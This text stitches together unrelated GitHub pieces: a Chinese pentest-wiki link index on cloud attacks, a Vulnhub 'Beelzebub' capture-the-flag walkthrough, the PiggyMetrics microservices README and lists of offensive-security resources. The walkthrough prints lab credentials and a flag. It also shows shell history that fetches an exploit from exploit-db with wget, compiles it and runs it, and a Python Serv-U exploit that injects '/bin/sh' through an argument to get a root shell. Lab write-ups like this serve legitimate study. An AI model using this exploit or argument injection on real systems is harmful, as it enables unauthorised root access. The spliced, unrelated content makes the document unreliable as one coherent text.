- [来自github的字典](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/字典/来自github的字典.md)
- [未认证的ElasticsearchDB](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/未认证的ElasticsearchDB.md)
- [favico信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/favico信息.md)
- [Github](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/Github.md)
- [git和svn](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/git和svn.md)
- [参数污染](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/参数污染.md)
- [通过.json的信息泄露](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/通过.json的信息泄露.md)
- [一行命令](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/一行命令/README.md)
- [使用grep快速去除垃圾数据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/一行命令/使用grep快速去除垃圾数据.md)
- [查找漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/一行命令/查找漏洞.md)
- [子域名接管](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/子域名接管.md)
- [测试是否存在heartbleed漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/测试是否存在heartbleed漏洞.md)
- [sql注入检测](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/sql注入检测.md)
- [TOP系列](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/TOP系列/README.md)
- [Top25LFI参数](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/TOP系列/Top25LFI参数.md)
- [Top25RCE参数](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/TOP系列/Top25RCE参数.md)
- [Top25重定向dorks](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/TOP系列/Top25重定向dorks.md)
- [Top25ssrf](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/TOP系列/Top25ssrf.md)
- [绕过登录限制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/绕过登录限制.md)
- [云安全](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/README.md)
- [AWS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/README.md)
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/初始访问.md)
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限提升.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限维持.md)
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/枚举.md)
- [AWS的服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/AWS的服务.md)
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/工具.md)
- [将EBS卷挂载到EC2Linux](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/将EBS卷挂载到EC2Linux.md)
- [使用AMI映像复制EC2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/使用AMI映像复制EC2.md)
- [通过API密钥获得AWS控制台访问权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/通过API密钥获得AWS控制台访问权限.md)
- [Golden-SAML-Attack](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/Golden-SAML-Attack.md)
- [Shadow-Copy-attack](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/Shadow-Copy-attack.md)
- [Lambda-提取函数的代码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/Lambda-提取函数的代码.md)
- [InstanceConnect-将SSH密钥推送到EC2实例](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/InstanceConnect-将SSH密钥推送到EC2实例.md)
- [SSM-命令执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/SSM-命令执行.md)
- [动态数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/动态数据库.md)
- [禁用CloudTrail](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/禁用CloudTrail.md)
- [通过混淆Cloudtrail日志和GuardDuty来掩盖踪迹](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/通过混淆Cloudtrail日志和GuardDuty来掩盖踪迹.md)
- [Docker](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Docker/README.md)
- [未授权API](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Docker/未授权API.md)
- [逃逸](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Docker/逃逸.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Docker/权限维持.md)
- [GCP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/GCP/README.md)
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/GCP/初始访问.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/GCP/权限维持.md)
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/GCP/枚举.md)
- [特权升级和横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/GCP/特权升级和横向移动.md)
- [kubernetes](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/README.md)
- [未授权API](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/未授权API.md)
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限提升.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限维持.md)
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/枚举.md)
- [Azure](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/README.md)
- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
- [Aliyun](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/README.md)
- [osskey](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/osskey.md)
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/工具.md)
|
# Beelzebub
Link: https://www.vulnhub.com/entry/beelzebub-1,742/
Level: Easy
Credits: Shaurya Sharma
## Description
Difficulty: Easy
You have to enumerate as much as you can and don't forget about the Base64.
For hints add me on
Twitter- ShauryaSharma05
---
## Enumeration
Nmap
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
```
Ffuf
Nikto
```
http://192.168.1.175/phpinfo.php
http://192.168.1.175/phpmyadmin/
```
![image](https://user-images.githubusercontent.com/5285547/136195726-5cfe5b93-818b-4232-9e71-645d63e7aca9.png)
Encoding to MD5
```
$ echo -n "beelzebub" | md5sum
d18e1e22becbd915b45e0e655429d487
```
New path to fuzz
```
http://IP/d18e1e22becbd915b45e0e655429d487/
ffuf -u http://192.168.1.175/d18e1e22becbd915b45e0e655429d487/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -mc all -fc 404,403 -ic -c
wp-content [Status: 301, Size: 352, Words: 20, Lines: 10]
wp-includes [Status: 301, Size: 353, Words: 20, Lines: 10]
wp-admin [Status: 301, Size: 350, Words: 20, Lines: 10]
```
```
wpscan --url http://192.168.1.175/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e
[i] User(s) Identified:
[+] krampus
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] valak
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```
```
http://192.168.1.175/d18e1e22becbd915b45e0e655429d487/wp-login.php
```
![image](https://user-images.githubusercontent.com/5285547/136202391-5ec0a7b2-82f1-46fa-9ea8-8b2853d7363b.png)
We get a new portal.
http://192.168.1.175/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/Talk%20To%20VALAK/
![image](https://user-images.githubusercontent.com/5285547/136202440-0eb2e755-257d-4676-838a-ec3156db9db2.png)
![image](https://user-images.githubusercontent.com/5285547/136202627-b78616e2-a251-458b-adaa-233ed358eb70.png)
## User
```
ssh krampus@IP
M4k3Ad3a1
```
```
krampus@beelzebub:~/Desktop$ cat user.txt
aq12uu909a0q921a2819b05568a992m9
```
## Root
```
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', 'P0k3M0n' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
```
```
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
```
```
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
```
Exploit: https://www.exploit-db.com/exploits/47009
I found the exploit on exploit-db, then went to the writeup for the exploit to learn more. Then I constructed the same exploit in python3.
python3 version
```
import os
args = ("\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", )
os.execv("/usr/local/Serv-U/Serv-U", args)
print("If you see this, the exploit failed")
```
![image](https://user-images.githubusercontent.com/5285547/136214584-279f8b94-f85d-4788-95bd-0c652d1351d5.png)
## Conclusion
Aweosome box, it was nice to be able to play with the exploit and know it can work in python too!
|
[![Build Status](https://travis-ci.org/sqshq/PiggyMetrics.svg?branch=master)](https://travis-ci.org/sqshq/PiggyMetrics)
[![codecov.io](https://codecov.io/github/sqshq/PiggyMetrics/coverage.svg?branch=master)](https://codecov.io/github/sqshq/PiggyMetrics?branch=master)
[![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/sqshq/PiggyMetrics/blob/master/LICENCE)
[![Join the chat at https://gitter.im/sqshq/PiggyMetrics](https://badges.gitter.im/sqshq/PiggyMetrics.svg)](https://gitter.im/sqshq/PiggyMetrics?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
# Piggy Metrics
**A simple way to deal with personal finances**
This is a [proof-of-concept application](http://my-piggymetrics.rhcloud.com), which demonstrates [Microservice Architecture Pattern](http://martinfowler.com/microservices/) using Spring Boot, Spring Cloud and Docker.
With a pretty neat user interface, by the way.
![](https://cloud.githubusercontent.com/assets/6069066/13864234/442d6faa-ecb9-11e5-9929-34a9539acde0.png)
![Piggy Metrics](https://cloud.githubusercontent.com/assets/6069066/13830155/572e7552-ebe4-11e5-918f-637a49dff9a2.gif)
## Functional services
PiggyMetrics was decomposed into three core microservices. All of them are independently deployable applications, organized around certain business domains.
<img width="880" alt="Functional services" src="https://cloud.githubusercontent.com/assets/6069066/13900465/730f2922-ee20-11e5-8df0-e7b51c668847.png">
#### Account service
Contains general user input logic and validation: incomes/expenses items, savings and account settings.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /accounts/{account} | Get specified account data | |
GET | /accounts/current | Get current account data | × | ×
GET | /accounts/demo | Get demo account data (pre-filled incomes/expenses items, etc) | | ×
PUT | /accounts/current | Save current account data | × | ×
POST | /accounts/ | Register new account | | ×
#### Statistics service
Performs calculations on major statistics parameters and captures time series for each account. Datapoint contains values, normalized to base currency and time period. This data is used to track cash flow dynamics in account lifetime.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /statistics/{account} | Get specified account statistics | |
GET | /statistics/current | Get current account statistics | × | ×
GET | /statistics/demo | Get demo account statistics | | ×
PUT | /statistics/{account} | Create or update time series datapoint for specified account | |
#### Notification service
Stores users contact information and notification settings (like remind and backup frequency). Scheduled worker collects required information from other services and sends e-mail messages to subscribed customers.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /notifications/settings/current | Get current account notification settings | × | ×
PUT | /notifications/settings/current | Save current account notification settings | × | ×
#### Notes
- Each microservice has it's own database, so there is no way to bypass API and access persistance data directly.
- In this project, I use MongoDB as a primary database for each service. It might also make sense to have a polyglot persistence architecture (сhoose the type of db that is best suited to service requirements).
- Service-to-service communication is quite simplified: microservices talking using only synchronous REST API. Common practice in a real-world systems is to use combination of interaction styles. For example, perform synchronous GET request to retrieve data and use asynchronous approach via Message broker for create/update operations in order to decouple services and buffer messages. However, this brings us to the [eventual consistency](http://martinfowler.com/articles/microservice-trade-offs.html#consistency) world.
## Infrastructure services
There's a bunch of common patterns in distributed systems, which could help us to make described core services work. [Spring cloud](http://projects.spring.io/spring-cloud/) provides powerful tools that enhance Spring Boot applications behaviour to implement those patterns. I'll cover them briefly.
<img width="880" alt="Infrastructure services" src="https://cloud.githubusercontent.com/assets/6069066/13906840/365c0d94-eefa-11e5-90ad-9d74804ca412.png">
### Config service
[Spring Cloud Config](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html) is horizontally scalable centralized configuration service for distributed systems. It uses a pluggable repository layer that currently supports local storage, Git, and Subversion.
In this project, I use `native profile`, which simply loads config files from the local classpath. You can see `shared` directory in [Config service resources](https://github.com/sqshq/PiggyMetrics/tree/master/config/src/main/resources). Now, when Notification-service requests it's configuration, Config service responses with `shared/notification-service.yml` and `shared/application.yml` (which is shared between all client applications).
##### Client side usage
Just build Spring Boot application with `spring-cloud-starter-config` dependency, autoconfiguration will do the rest.
Now you don't need any embedded properties in your application. Just provide `bootstrap.yml` with application name and Config service url:
```yml
spring:
application:
name: notification-service
cloud:
config:
uri: http://config:8888
fail-fast: true
```
##### With Spring Cloud Config, you can change app configuration dynamically.
For example, [EmailService bean](https://github.com/sqshq/PiggyMetrics/blob/master/notification-service/src/main/java/com/piggymetrics/notification/service/EmailServiceImpl.java) was annotated with `@RefreshScope`. That means, you can change e-mail text and subject without rebuild and restart Notification service application.
First, change required properties in Config server. Then, perform refresh request to Notification service:
`curl -H "Authorization: Bearer #token#" -XPOST http://127.0.0.1:8000/notifications/refresh`
Also, you could use Repository [webhooks to automate this process](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_push_notifications_and_spring_cloud_bus)
##### Notes
- There are some limitations for dynamic refresh though. `@RefreshScope` doesn't work with `@Configuration` classes and doesn't affect `@Scheduled` methods
- `fail-fast` property means that Spring Boot application will fail startup immediately, if it cannot connect to the Config Service.
- There are significant [security notes](https://github.com/sqshq/PiggyMetrics#security) below
### Auth service
Authorization responsibilities are completely extracted to separate server, which grants [OAuth2 tokens](https://tools.ietf.org/html/rfc6749) for the backend resource services. Auth Server is used for user authorization as well as for secure machine-to-machine communication inside a perimeter.
In this project, I use [`Password credentials`](https://tools.ietf.org/html/rfc6749#section-4.3) grant type for users authorization (since it's used only by native PiggyMetrics UI) and [`Client Credentials`](https://tools.ietf.org/html/rfc6749#section-4.4) grant for microservices authorization.
Spring Cloud Security provides convenient annotations and autoconfiguration to make this really easy to implement from both server and client side. You can learn more about it in [documentation](http://cloud.spring.io/spring-cloud-security/spring-cloud-security.html) and check configuration details in [Auth Server code](https://github.com/sqshq/PiggyMetrics/tree/master/auth-service/src/main/java/com/piggymetrics/auth).
From the client side, everything works exactly the same as with traditional session-based authorization. You can retrieve `Principal` object from request, check user's roles and other stuff with expression-based access control and `@PreAuthorize` annotation.
Each client in PiggyMetrics (account-service, statistics-service, notification-service and browser) has a scope: `server` for backend services, and `ui` - for the browser. So we can also protect controllers from external access, for example:
``` java
@PreAuthorize("#oauth2.hasScope('server')")
@RequestMapping(value = "accounts/{name}", method = RequestMethod.GET)
public List<DataPoint> getStatisticsByAccountName(@PathVariable String name) {
return statisticsService.findByAccountName(name);
}
```
### API Gateway
As you can see, there are three core services, which expose external API to client. In a real-world systems, this number can grow very quickly as well as whole system complexity. Actually, hundreds of services might be involved in rendering of one complex webpage.
In theory, a client could make requests to each of the microservices directly. But obviously, there are challenges and limitations with this option, like necessity to know all endpoints addresses, perform http request for each peace of information separately, merge the result on a client side. Another problem is non web-friendly protocols which might be used on the backend.
Usually a much better approach is to use API Gateway. It is a single entry point into the system, used to handle requests by routing them to the appropriate backend service or by invoking multiple backend services and [aggregating the results](http://techblog.netflix.com/2013/01/optimizing-netflix-api.html). Also, it can be used for authentication, insights, stress and canary testing, service migration, static response handling, active traffic management.
Netflix opensourced [such an edge service](http://techblog.netflix.com/2013/06/announcing-zuul-edge-service-in-cloud.html), and now with Spring Cloud we can enable it with one `@EnableZuulProxy` annotation. In this project, I use Zuul to store static content (ui application) and to route requests to appropriate microservices. Here's a simple prefix-based routing configuration for Notification service:
```yml
zuul:
routes:
notification-service:
path: /notifications/**
serviceId: notification-service
stripPrefix: false
```
That means all requests starting with `/notifications` will be routed to Notification service. There is no hardcoded address, as you can see. Zuul uses [Service discovery](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#service-discovery) mechanism to locate Notification service instances and also [Circuit Breaker and Load Balancer](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#http-client-load-balancer-and-circuit-breaker), described below.
### Service discovery
Another commonly known architecture pattern is Service discovery. It allows automatic detection of network locations for service instances, which could have dynamically assigned addresses because of auto-scaling, failures and upgrades.
The key part of Service discovery is Registry. I use Netflix Eureka in this project. Eureka is a good example of the client-side discovery pattern, when client is responsible for determining locations of available service instances (using Registry server) and load balancing requests across them.
With Spring Boot, you can easily build Eureka Registry with `spring-cloud-starter-eureka-server` dependency, `@EnableEurekaServer` annotation and simple configuration properties.
Client support enabled with `@EnableDiscoveryClient` annotation an `bootstrap.yml` with application name:
``` yml
spring:
application:
name: notification-service
```
Now, on application startup, it will register with Eureka Server and provide meta-data, such as host and port, health indicator URL, home page etc. Eureka receives heartbeat messages from each instance belonging to a service. If the heartbeat fails over a configurable timetable, the instance will be removed from the registry.
Also, Eureka provides a simple interface, where you can track running services and number of available instances: `http://localhost:8761`
### Load balancer, Circuit breaker and Http client
Netflix OSS provides another great set of tools.
#### Ribbon
Ribbon is a client side load balancer which gives you a lot of control over the behaviour of HTTP and TCP clients. Compared to a traditional load balancer, there is no need in additional hop for every over-the-wire invocation - you can contact desired service directly.
Out of the box, it natively integrates with Spring Cloud and Service Discovery. [Eureka Client](https://github.com/sqshq/PiggyMetrics#service-discovery) provides a dynamic list of available servers so Ribbon could balance between them.
#### Hystrix
Hystrix is the implementation of [Circuit Breaker pattern](http://martinfowler.com/bliki/CircuitBreaker.html), which gives a control over latency and failure from dependencies accessed over the network. The main idea is to stop cascading failures in a distributed environment with a large number of microservices. That helps to fail fast and recover as soon as possible - important aspects of fault-tolerant systems that self-heal.
Besides circuit breaker control, with Hystrix you can add a fallback method that will be called to obtain a default value in case the main command fails.
Moreover, Hystrix generates metrics on execution outcomes and latency for each command, that we can use to [monitor system behavior](https://github.com/sqshq/PiggyMetrics#monitor-dashboard).
#### Feign
Feign is a declarative Http client, which seamlessly integrates with Ribbon and Hystrix. Actually, with one `spring-cloud-starter-feign` dependency and `@EnableFeignClients` annotation you have a full set of Load balancer, Circuit breaker and Http client with sensible ready-to-go default configuration.
Here is an example from Account Service:
``` java
@FeignClient(name = "statistics-service")
public interface StatisticsServiceClient {
@RequestMapping(method = RequestMethod.PUT, value = "/statistics/{accountName}", consumes = MediaType.APPLICATION_JSON_UTF8_VALUE)
void updateStatistics(@PathVariable("accountName") String accountName, Account account);
}
```
- Everything you need is just an interface
- You can share `@RequestMapping` part between Spring MVC controller and Feign methods
- Above example specifies just desired service id - `statistics-service`, thanks to autodiscovery through Eureka (but obviously you can access any resource with a specific url)
### Monitor dashboard
In this project configuration, each microservice with Hystrix on board pushes metrics to Turbine via Spring Cloud Bus (with AMQP broker). The Monitoring project is just a small Spring boot application with [Turbine](https://github.com/Netflix/Turbine) and [Hystrix Dashboard](https://github.com/Netflix/Hystrix/tree/master/hystrix-dashboard).
See below [how to get it up and running](https://github.com/sqshq/PiggyMetrics#how-to-run-all-the-things).
Let's see our system behavior under load: Account service calls Statistics service and it responses with a vary imitation delay. Response timeout threshold is set to 1 second.
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14194375/d9a2dd80-f7be-11e5-8bcc-9a2fce753cfe.png">
<img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127349/21e90026-f628-11e5-83f1-60108cb33490.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127348/21e6ed40-f628-11e5-9fa4-ed527bf35129.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127346/21b9aaa6-f628-11e5-9bba-aaccab60fd69.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127350/21eafe1c-f628-11e5-8ccd-a6b6873c046a.gif">
--- |--- |--- |--- |
| `0 ms delay` | `500 ms delay` | `800 ms delay` | `1100 ms delay`
| Well behaving system. The throughput is about 22 requests/second. Small number of active threads in Statistics service. The median service time is about 50 ms. | The number of active threads is growing. We can see purple number of thread-pool rejections and therefore about 30-40% of errors, but circuit is still closed. | Half-open state: the ratio of failed commands is more than 50%, the circuit breaker kicks in. After sleep window amount of time, the next request is let through. | 100 percent of the requests fail. The circuit is now permanently open. Retry after sleep time won't close circuit again, because the single request is too slow.
### Log analysis
Centralized logging can be very useful when attempting to identify problems in a distributed environment. Elasticsearch, Logstash and Kibana stack lets you search and analyze your logs, utilization and network activity data with ease.
Ready-to-go Docker configuration described [in my other project](http://github.com/sqshq/ELK-docker).
## Security
An advanced security configuration is beyond the scope of this proof-of-concept project. For a more realistic simulation of a real system, consider to use https, JCE keystore to encrypt Microservices passwords and Config server properties content (see [documentation](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_security) for details).
## Infrastructure automation
Deploying microservices, with their interdependence, is much more complex process than deploying monolithic application. It is important to have fully automated infrastructure. We can achieve following benefits with Continuous Delivery approach:
- The ability to release software anytime
- Any build could end up being a release
- Build artifacts once - deploy as needed
Here is a simple Continuous Delivery workflow, implemented in this project:
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14159789/0dd7a7ce-f6e9-11e5-9fbb-a7fe0f4431e3.png">
In this [configuration](https://github.com/sqshq/PiggyMetrics/blob/master/.travis.yml), Travis CI builds tagged images for each successful git push. So, there are always `latest` image for each microservice on [Docker Hub](https://hub.docker.com/r/sqshq/) and older images, tagged with git commit hash. It's easy to deploy any of them and quickly rollback, if needed.
## How to run all the things?
Keep in mind, that you are going to start 8 Spring Boot applications, 4 MongoDB instances and RabbitMq. Make sure you have `4 Gb` RAM available on your machine. You can always run just vital services though: Gateway, Registry, Config, Auth Service and Account Service.
#### Before you start
- Install Docker and Docker Compose.
- Export environment variables: `CONFIG_SERVICE_PASSWORD`, `NOTIFICATION_SERVICE_PASSWORD`, `STATISTICS_SERVICE_PASSWORD`, `ACCOUNT_SERVICE_PASSWORD`, `MONGODB_PASSWORD` (make sure they were exported: `printenv`)
- Make sure to build the project: `mvn package [-DskipTests]`
#### Production mode
In this mode, all latest images will be pulled from Docker Hub.
Just copy `docker-compose.yml` and hit `docker-compose up`
#### Development mode
If you'd like to build images yourself (with some changes in the code, for example), you have to clone all repository and build artifacts with maven. Then, run `docker-compose -f docker-compose.yml -f docker-compose.dev.yml up`
`docker-compose.dev.yml` inherits `docker-compose.yml` with additional possibility to build images locally and expose all containers ports for convenient development.
#### Important endpoints
- http://localhost:80 - Gateway
- http://localhost:8761 - Eureka Dashboard
- http://localhost:9000/hystrix - Hystrix Dashboard (paste Turbine stream link on the form)
- http://localhost:8989 - Turbine stream (source for the Hystrix Dashboard)
- http://localhost:15672 - RabbitMq management (default login/password: guest/guest)
#### Notes
All Spring Boot applications require already running [Config Server](https://github.com/sqshq/PiggyMetrics#config-service) for startup. But we can start all containers simultaneously because of `depends_on` docker-compose option.
Also, Service Discovery mechanism needs some time after all applications startup. Any service is not available for discovery by clients until the instance, the Eureka server and the client all have the same metadata in their local cache, so it could take 3 heartbeats. Default heartbeat period is 30 seconds.
## Feedback welcome
PiggyMetrics is open source, and would greatly appreciate your help. Feel free to contact me with any questions.
|
# BugBountyTips
记录一些国外漏洞赏金猎人的挖洞技巧和一些有意思的东西
### 微信公众号
![](we-public.jpg)
### One Line
- [One line `crt.sh` subdomain discover code](信息收集/one-line.md)
### Google Dork Tips
- [Google Dork Tips](信息收集/Google-Dork.md)
### 信息收集
- [基于浏览器的子域名爆破](信息收集/run.js)
### Bypass
- [Bypass WAF by Shortening IP Addresses](bypass/bypass-ip.md)
### 挖洞技巧
- [从失效的链接中挖掘存储xss,利用js拓展攻击面](find-xss/xss-tips.md)
|
# 所有收集类项目:
- [收集的所有开源工具: sec-tool-list](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式
- [全平台逆向资源: awesome-reverse-engineering](https://github.com/alphaSeclab/awesome-reverse-engineering):
- Windows平台安全: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/.NET/Process-Injection/Code-Injection/DEP/Kernel/...
- Linux安全: ELF/...
- macOS/iXxx安全: Mach-O/越狱/LLDB/XCode/...
- Android安全: HotFix/XPosed/Pack/Unpack/Emulator/Obfuscate
- 知名工具: IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/...
- [网络相关的安全资源: awesome-network-stuff](https://github.com/alphaSeclab/awesome-network-stuff):
- 网络通信: 代理/SS/V2ray/GFW/反向代理/隧道/VPN/Tor/I2P/...
- 网络攻击: 中间人/PortKnocking/...
- 网络分析: 嗅探/协议分析/网络可视化/网络分析/网络诊断等
- [攻击性网络安全资源: awesome-cyber-security](https://github.com/alphaSeclab/awesome-cyber-security): 漏洞/渗透/物联网安全/数据渗透/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/免杀/CobaltStrike/侦查/OSINT/社工/密码/凭证/威胁狩猎/Payload/WifiHacking/无线攻击/后渗透/提权/UAC绕过/...
